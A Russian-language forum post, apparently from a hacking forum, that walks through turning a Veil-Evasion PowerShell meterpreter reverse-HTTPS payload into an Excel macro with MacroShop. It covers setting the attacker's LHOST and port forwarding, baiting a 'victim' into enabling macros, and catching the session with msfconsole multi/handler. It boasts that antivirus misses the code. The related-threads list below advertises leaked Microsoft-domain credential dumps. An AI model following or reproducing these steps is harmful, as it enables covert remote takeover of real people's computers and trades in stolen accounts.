Penetration Testing with Microsoft Office

Admin

Администратор
В этой статье я покажу, как можно получить доступ к удаленному компьютеру, используя Veil Evasion и Microsoft Excel. А точнее одно свойство Excel – поддержка макросов.

Макрос - это программа, которая содержит набор инструкций выполняющих какие либо действия, как автоматически, так и по требованию пользователя, т.е. выполняются явно и неявно. Широкое распространение, данное понятие получило благодаря корпорации Microsoft, которая реализовала возможность написания макросов в своих продуктах, а именно Office (Word, Excel, Access и т.д.). Используемый язык в макросах - Visual Basic, так же продукт Microsoft, но с некоторыми ограничениями. Макрокоманды, способны автоматизировать большинство процессов и значительно сократить время на обработку данных.

Способ получения Veil Evasion описан тут - https://ufolabs.pro/threads/vzlom-udalennogo-pk-veil-evasion-metasploit.597/

Запускаем Veil Evasion:
> ./Veil-Evasion.py

Вводим команду:
list (покажет список доступных пайлоадов)
77248797bb99eef69cb986e1d3cdb9dd.png

Мы будем использовать пайлоад с ID 23. Вводим:

> use powershell/meterpreter/rev_https

или

> use 23

Обратный протокол HTTPS, здесь будет успешно использован, в случае если файрвол у жертвы настроен таким образом, чтобы пропускать трафик по TCP. В большинстве случаев, на компьютере HTTPS не заблокирован.

Настроим Veil для нашего случая, пишем:

> set LHOST 172.16.0.199

Тут я немного прервусь, для объяснений, т.к. вопросы уже были.

Так как, я нахожусь с атакуемым компьютером в одной подсети, мы подключены к одному роутеру, то в поле LHOST я вписываю свой локальный адрес.
3fe9ab38bfaf2fb00393f4d57681340e.png

Именно на него «постучится» цель, после того как на нем сработает полезная нагрузка. Чтобы таким же образом подключится к компьютеру находящемуся в другой сети, вообще в другом городе/стране, необходимо сделать иначе. Для удобства лучше иметь статический (белый) IP адрес. К примеру, у вас роутер, вашей машине, с которой вы атакуете, был присвоен локальный адрес из диапазона 192.168.0.ХХХ. Но, в интернет вы выходите из под своего внешнего адреса, который присвоил вашему роутеру провайдер. Ваш компьютер, с которого вы проводите проникновение, находится за NAT роутера.
155bd37075fa01c23fa4f7580afd30b9.png

Допустим этот адрес 82.198.34.88, для того, чтобы целевой компьютер постучался на него мы в поле LHOST его и укажем. В опциях так же есть поле LPORT:

5ba34575950d4c26dc2dd2eb48678a28.png

Именно на этот LHOST и LPORT, будет пытаться подсоединиться цель. Затем необходимо указать роутеру, чтобы все пакеты, адресованные 8443 порту, он направлял нашей машине с Kali, у которой адрес 192.168.0.ХХХ. Для этого добавляем такое правило:

f793ca8967130fd1005d99749bebed92.png

Теперь все пакеты, которые предназначаются 443 (у меня так) порту, получит моя Kali c локальным адресом 192.168.0.101. Идем далее.

> generate
d0f7d6f86c34195a35ff0876d078f0f4.png

Вводим имя:
0b0673aed67852e7f0981033939051b7.png

Veil-Evasion сгенерировала нам файл win8.1.bat в директории - /usr/share/veil-output/source/

1668afbd9a7daf7b6109f747f7e9222c.png

Теперь откроем новое окно терминала и установим MacroShop. MacroShop представляет собой набор скриптов, помогающих в работе с пайлоадами, через Office Macros. Большинство из них, написаны на Python. Для его установки вводим:

> git clone https://github.com/khr0x40sh/MacroShop

b3d92c276c33bdc3fff0901a14245aef.png

После установки, переместим файл win8.1 в директорию MacroShop.
278e0b3ea796add6279f8c4b7fa02fe7.png

Теперь, в терминале перейдем в директорию MacroShop, и пишем:

> python macro_safe.py windus.bat file.txt (windus.bat – потому, что я его пересоздал)

77ccf1f8e042655d560dba0739af21e5.png

После того, как процесс успешно завершился, откроем новый файл Excel (у себя) и проделаем следующее:

7a6c1c0b165c68c5350984e6a2090d92.png

Пишем имя макроса и создаем его. В открывшееся поле для редактирования, копируем код, который мы получили в файле – file.txt, затем сохраним макрос.

6f7f9b6c48fe72d2cf326cc8b469ba09.png

Копируем код полностью, заменяя строки которые были в начале макроса, это важно!

Сохраняем в формате, как на скриншоте:
d7e2872b46da5250e6eff300d224bd97.png

В самом документе пишем все, что угодно, нам нужно заинтересовать цель в открытии документа и включения макроса.

Теперь, когда файл оказался на целевом компьютере, у себя в терминале откроем msfconsole
0a9f5e35b43c890533c159584fb96d5b.png

и введем следующие команды:

> use multi/handler

> set payload/windows/meterpreter/reverse_https

> set LHOST 192.168.0.XXX

> set LPORT XXX (ваш порт)

> exploit


Когда на целевом хосте буде открыт дынный файл и выполнится макрос, у вас откроется сессия meterpreter, как и было обещано.
de3133dadedf2a49694b2252462f7438.png

Дальше дело техники. Спасибо за внимание.

P.S. Антивирусы не определяют данный код как вредоносный.

 
Похожие темы
E.Alderson Ищу наставника по penetration tester Ищу работу. Предлагаю свои услуги. 0
Eliot_lite.373 Ищу работу в сфере penetration tester, по w/b направлениям. Ищу работу. Предлагаю свои услуги. 0
Admin Интересно Microsoft раскрыла детали использования cookie для управления PHP-веб-шеллами на Linux-серверах. Новости в сети 0
Admin Интересно Астронавты Artemis II столкнулись с проблемами в Microsoft Outlook. Новости в сети 0
Admin Интересно Microsoft предупреждает о вредоносных VBS-файлах, распространяемых через WhatsApp. Новости в сети 0
Admin Интересно Microsoft отозвала проблемный патч KB5079391 для Windows 11. Новости в сети 0
Admin Интересно Microsoft позволяет Copilot использовать несколько моделей ИИ одновременно для взаимной проверки. Новости в сети 0
Admin Интересно Microsoft представила новый тест для улучшения взаимодействия роботов с предметами. Новости в сети 0
Admin Интересно Microsoft не успел, а хакеры успели. 0Day в Office помог проникнуть в инфраструктуру Европы. Новости в сети 0
Admin Интересно Китай, США и полмиллиона дыр в безопасности. Старые серверы Microsoft превратились в легкую добычу. Новости в сети 0
Admin Интересно Фишинговая атака через Device Code затронула более 340 организаций Microsoft 365. Новости в сети 0
Admin Интересно Microsoft запретила разгон SSD-дисков в Windows 11. Новости в сети 0
Admin Интересно Microsoft обещает исправить Windows 11, но пользователи недовольны. Новости в сети 0
Admin Интересно Microsoft улучшает Windows 11 на основе обратной связи пользователей. Новости в сети 0
Admin Интересно Microsoft предупреждает о фишинговых атаках с использованием вредоносного ПО. Новости в сети 0
Admin Интересно CISA предупреждает о рисках использования Microsoft Intune после атаки на Stryker. Новости в сети 0
Admin Интересно Илон Маск анонсировал проект Macrohard — цифровую копию Microsoft. Новости в сети 0
Admin Интересно Microsoft запустила медицинский ИИ Copilot Health. Новости в сети 0
Admin Интересно Microsoft исправила 84 уязвимости в мартовском обновлении безопасности. Новости в сети 0
Admin Интересно Microsoft внедрит обновления Windows в фоновом режиме. Новости в сети 0
Admin Интересно Microsoft представила компактную нейросеть Phi-4-reasoning-vision-15B. Новости в сети 0
Admin Интересно Microsoft меняет правила открытия ссылок в Copilot. Новости в сети 0
Admin Интересно Слишком сложно для Microsoft. Как три разработчика сделали сайт npm лучше, чем целая корпорация. Новости в сети 0
Admin Интересно Microsoft раскрыла кампанию ClickFix, использующую Windows Terminal для распространения Lumma Stealer. Новости в сети 0
Admin Интересно Microsoft предупреждает: злоумышленники используют Google для распространения вредоносного ПО. Новости в сети 0
Admin Интересно Microsoft предупреждает: не доверяйте ссылкам от Microsoft. Новости в сети 0
Admin Интересно Microsoft предупреждает о троянизированных игровых утилитах, распространяющих RAT. Новости в сети 0
Admin Интересно «Хотите Windows? Используйте наш инструмент». Microsoft закрывает все неофициальные пути к ISO-образам. Новости в сети 0
Admin Интересно Microsoft - соучастник фишинга: официальная надстройка Outlook годами крала пароли тысяч пользователей. Новости в сети 0
Admin Интересно Один файл + один клик = ODay в MS Office. Microsoft принимает меры против эксплуатируемой уязвимости. Новости в сети 0
Admin Интересно Сначала помогут, потом ограбят. Как хакеры превратили Microsoft Quick Assist в «троянского коня». Новости в сети 0
Admin Интересно Российский хакер нашел «дыру» в Windows. Microsoft пришлось обновить 35 версий системы. Новости в сети 0
Admin Интересно Аста ла виста, бейби. Microsoft официально закрыла историю самой спорной Windows. Новости в сети 0
Admin Интересно «Ваш пароль истекает» (на самом деле нет). Microsoft объясняет, почему нельзя верить даже письмам от собственного HR. Новости в сети 0
D 150k Microsoft D4RKNETHUB CLOUD Раздачи и сливы 0
D 489.6k Microsoft D4RKNETHUB CLOUD Раздачи и сливы 0
D 49.5k Microsoft D4RKNETHUB CLOUD Раздачи и сливы 0
Support81 Новая тактика «Призрачных звонков» использует Zoom и Microsoft Teams для операций C2 Новости в сети 0
Support81 Вирус-вымогатель Akira использует инструмент настройки процессора, чтобы отключить Microsoft Defender Новости в сети 0
ValidMail ♋ 14kk MICROSOFT DOMAIN WITH VALID 05/08/25 ♋ Раздачи и сливы 0
ValidMail ♋ 1.2 MILLION MICROSOFT DOMAIN (HAVE VALID) 30/07/25 ♋ Раздачи и сливы 0
Support81 Microsoft снова сыграла на руку хакерам — корпоративные сети ломают через официальный софт Новости в сети 0
ValidMail ♋ 32k MICROSOFT DOMAINS WITH VALID 21.05.25 ♋ Раздачи и сливы 0
Support81 Плати или рискуй: Microsoft будет брать плату за обновления Windows Новости в сети 0
Support81 Microsoft дала ИИ настоящий инструмент программиста — и он впервые узнал, как сложно быть человеком Новости в сети 0
BinaryCloud (62.263 lines) Semi Private Microsoft Domain Leak Раздачи и сливы 0
BinaryCloud (101.200 lines) Good leak Microsoft Domain BinaryCloud Раздачи и сливы 0
BinaryCloud (78.231 lines) Good leak Microsoft Domain BinaryCloud Раздачи и сливы 0
BinaryCloud (73.764 lines) Semi Private Microsoft Domain Leak Раздачи и сливы 0
BinaryCloud (58.262 lines) UHQ Leak Combos Microsoft Domain Раздачи и сливы 0

Название темы